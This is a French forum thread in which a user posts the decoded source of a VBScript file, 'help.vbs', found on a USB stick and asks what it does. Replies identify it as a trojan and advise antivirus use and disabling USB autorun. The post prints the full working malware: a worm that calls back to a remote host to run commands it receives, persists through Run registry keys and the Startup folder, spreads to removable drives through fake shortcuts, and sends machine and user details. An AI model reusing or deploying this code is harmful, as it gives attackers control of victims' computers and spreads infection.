Besoin d'aide pour comprendre du code (vbs??) (Help.vbs = virus ??? )Résolu

Question

bonjour a tous ! Alors voila -_- je suis tombé sur un fichier "help.vbs" qui c'est mis a se dupliquer étrangement.. après édition du fichier, le code était vraiment étrange.. une succession de chiffre avec 3 ligne de vbs a la fin j'ai fais une petite page wep pour décrypter ces chiffres (conversion CHR).. qui m'ont donné une autre suite de chiffre que j'ai decrypté a leur tour.. et cela ma donné ca !! On Error Resume Next:diM sh:set sh=WScript.createObject("WScript.Shell"):diM fs:set fs=CreatEObjeCt("Scripting.FileSystemObject"):dim hosT:host="google-plus.redirectme.net":Dim port:port=90:Dim DR:DR=sh.ExPandenviRonmenTStrings("%temp%")&"":dim FN:FN="help.vbs":dim Fh:dim uS:Us="~":ins:dim spl:spl="jnJnj":Dim i:i=0:WhiLe true:dim a:a=sPliT(post("ready",""),spl):select case a(0):case"exc":dIm sa:Sa=a(1):execUTe sa:caSe"uns":Uns:end select:wScript.slEep 4000:i=i+1:if i>2 then i=0:xins:eNd if:wenD:function Ins:on error rEsume next:us=Sh.regread("HKCU\updatee"):If us="~"then if lcAse(miD(wscRipt.scriptfullname,2))=":"&lcasE(fn)tHen uS="y":sh.RegwRiTe"HKCU\updatee",us,"REG_SZ":ElsE uS="n":SH.regwrite"HKCU\updatee",us,"REG_SZ":end if:eNd if:ERr.Clear:fs.CopyFiLe wSCript.scripTfullnAmE,dR&fn,true:Set fh=Fs.OpenTeXTFIle(Dr&fN,8,false):if Err.Number>0 THeN wscript.QUit:end if:xIns:end funCtioN:sub xins:on erRor reSume next:sh.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn,chrw(34)&dr&fn&chrw(34),"REG_SZ":sh.regWrIte"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"&fn,cHrW(34)&dr&fn&chrw(34),"REG_SZ":fS.CopYfile WsCrIpt.scriptfullnaMe,CreAteObject("Shell.Application").NAmeSPace(&H7).Self.Path&""&fn,true:foR eacH xx iN fs.drives:if xx.isready then if xx.FreeSpAce>0 theN if xX.drivEtypE=1 thEn if Fs.fileexists(xx.patH&""&fn)then fs.getfile(Xx.path&""&fn).AtTribuTes=0:enD If:fs.coPYfile dr&fn,xX.patH&""&fn,TruE:For EacH x In fs.GETFolder(xx.pAth&"").Files:wScript.sLeep 1:If instr(x.namE,".")then if lcase(SplIt(x.naMe,".")(uBoUnd(sPlit(x.nAme,"."))))<>"lnk"then x.ATtribuTes=2:if ucase(x.namE)<>ucasE(Fn)then With Sh.createSHORtcut(xx.patH&""&x.name&".lnk"):.TarGetPath="cmd.exe":.WorKIngDIrectoRY="":.ArgumenTS="/c start "&Replace(Fn," ",ChrW(34)&" "&ChrW(34))&"&start "&replACE(X.name," ",ChrW(34)&" "&ChRW(34))&" & exit":.IconLocation=sh.regreaD("HKLM\SOFTWARE\Classes"&sh.rEgrEad("HKLM\SOFTWARE\Classes\."&split(x.name,".")(UBound(SpLit(x.name,".")))&"")&"\DefaultIcon"):if inStr(.icOnlOCation,",")=0 then.iconlocaTion=.iConlocation&",0":eNd if:.SAve():end with:end if:end if:end if:Next:eNd if:end If:enD iF:Next:err.CLear:end sub:FuNction uns:ON error resuMe Next:fh.cLosE:Sh.RegDeletE"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn:Sh.REgDEleTe"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"&Fn:fs.DEleTeFile dr&Fn,true:fs.DelEteFile CReatEOBject("Shell.Application").NameSpAcE(&H7).Self.PAth&""&Fn,true:for eacH xx in fs.Drives:if xx.IsrEAdy theN if XX.FReESpace>0 then for EacH X in fs.GeTFolder(xx.pAth&"").Files:On ERror ReSume nexT:if insTr(x.name,".")then if lcasE(spLit(x.Name,".")(UBound(SpliT(x.Name,"."))))<>"lnk"then x.AttrIbutes=0:if UCase(X.nAme)<>ucase(fN)then fs.deLetefIle(xx.Path&""&x.name&".lnk"):else fs.deletefile(Xx.path&""&x.Name):eND iF:end iF:enD if:NExT:end if:enD if:nExt:wscript.quit:enD fuNction:funcTion post(cmd,da):pOst="":dim o:Set o=CreateobjecT("MSXML2.XMLHTTP"):o.open"POST","http://"& HoSt&":"&Port&"/"&cmd,faLse:o.sEtrequestHeader"User-Agent:",inf:o.send da:posT=o.responSETExT:end fUnctiOn:diM Xinf:function inf:On errOr resuMe next:if xinf=""tHeN dim s:s="??":S=Hwd:inf=Inf&s&"":s="??":S=sh.expaNdENvironmEntstrIngS("%COMPUTERNAME%"):inf=inf&S&"":s="??":s=sh.EXpandENviRonMentstRings("%USERNAME%"):Inf=inf&s&"":s="??":Set a=geTObject("winmgmts:{impersonationLevel=impersonate}!\. oot\cimv2"):Set aA=a.ExEcQuery("Select * from Win32_OperatingSystem"):For Each Aaa iN aa:S=aaa.CapTion:exit foR:Next:inf=inf&s&"\0.3"&uS&""&pid:xInf=inf:elsE inf=xinf:end If:end funCTioN:funCtIon HwD:HwD="key8_??":On Error REsumE Next:Set a=gEtObject("winmgmts:{impersonationLevel=impersonate}!\. oot\cimv2"):Set aa=a.Execquery("SELECT * FROM Win32_LogicalDisk"):For Each aaa in aa:iF aaa.VolUmeSerialnumber<>""then HWD="key8_"&aAa.VolumeseriaLNumber:exIt foR:end IF:NexT:enD funCtion:FunctiOn PiD:PID=0:on erroR resume nEXt:PID=getOBJect("winmgmts:root\cimv2").GEt("Win32_Process.Handle='"&sh.Exec("update.exe").ProCessID&"'").ParenTProcEssid:EnD Function ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' ' '******************************************************* ' Je ne connais pas assez le vbs pour comprendre tout le code.. Alors je fais appel a ceux qui auront les connaissances ^^' si quelqu'un est assez calé pour me dire exactement ce que cela fait svp !!! pour ce que j'ai compris et isolé ca doit transmettre le num de serie de windows a l'url "google-plus. redirectme. net" et ca modifie la clef registre - HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ mais pour le reste ?? neeed help pls !!

NHenry · Accepted Answer

Bonjour, 

sh.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn

Oui, ça fait penser à un virus.

v----Signature--------v----------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, celui-ci pour bien poser votre question ou encore celui-ci pour les PFE et autres exercices.[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : ).[*]En VB.NET pensez à activer Option Explicit et Option Strict (propriété du projet) et à retirer l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références dans les propriétés du projet).[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés/list
---
Mon site

ucfoutu · Answer

Bonjour,
Bon ===>>
Voilà voilà
Certains commenceront à comprendre pourquoi d'autres (dont moi) on inhibé l'exécution de scripts (dont VBS) sur leur machine .
Bien sûr (pour les développeurs sous VB5, VB6 et VBA) : il faut faire harakiri de certaines facilités (FSO en premier lieu et loin devant) et apprendre à développer autrement. 
________________________
Réponse exacte ? => "REPONSE ACCEPTEE" facilitera les recherches.
Pas d'aide en ligne installée ? => ne comptez pas sur moi pour simplement répéter son contenu. Je n'interviendrai que si nécessité de la compléter.

acive · Answer

Bonjour,

foR eacH xx iN fs.drives ==>> Pour chaque disque/partition;
if xx.isready then if xx.FreeSpAce>0 theN ==>> si le lecteur est prêt et son espace libre est supérieur à zéro;

Pas bon du tout... même supprimé je suis sur qu'il va se régénérer.
 
Conseil: installe un antivirus.

Cordialement


CF2i - Guadeloupe
Ingénierie Informatique

ucfoutu · Answer

Va maintenant te falloir te débarrasser de cette "saloperie", signée Trojan.VBS.TWW ===>>
1) rien à voir, ni avec VB.Net, ni avec le développement.  Consulte donc des sites spécialisés/lutte antivirus et autres bébêtes 
2) tu n'as pas attrapé ce pou par hasard, mais : soit en téléchargeant "les yeux fermés" n'importe quoi, soit en échangeant des fichiers "entre copains". Au passage : contagion facilitée grandement par échange de fichiers Office (Excel, Word, etc ...). 
Et la plupart du temps : à l'insu même de ceux avec lesquels tu as "généreusement échangé".
Va falloir commencer à mettre un terme à ces échanges-là
Bonne chance.

________________________
Réponse exacte ? => "REPONSE ACCEPTEE" facilitera les recherches.
Pas d'aide en ligne installée ? => ne comptez pas sur moi pour simplement répéter son contenu. Je n'interviendrai que si nécessité de la compléter.

Tanahe · Answer

Merci bcp pour vos reponses !!

@ucfoutu: effectivement recup apres avoir connecter une clef usb que j'avais utilisé pour depanné un pc.. et j'ai un antivirus.. avast.. enfin je croyais que c&#8217;était un antivirus -_-.. maintenant je doute..

NHenry · Answer

Bonjour, 

Règle de base, TOUJOURS désactiver les autoruns des clés USB (option de l'AV ou configuration du registre Windows), c'est une base de la sécurité, avec un peu de config, j'ai évité un paquet de ces merdes.
(Note, Norton et Avira le permettent le base).

v----Signature--------v----------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, celui-ci pour bien poser votre question ou encore celui-ci pour les PFE et autres exercices.[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : ).[*]En VB.NET pensez à activer Option Explicit et Option Strict (propriété du projet) et à retirer l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références dans les propriétés du projet).[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés/list
---
Mon site

Besoin d'aide pour comprendre du code (vbs??) (Help.vbs = virus ??? )

6 réponses

Votre réponse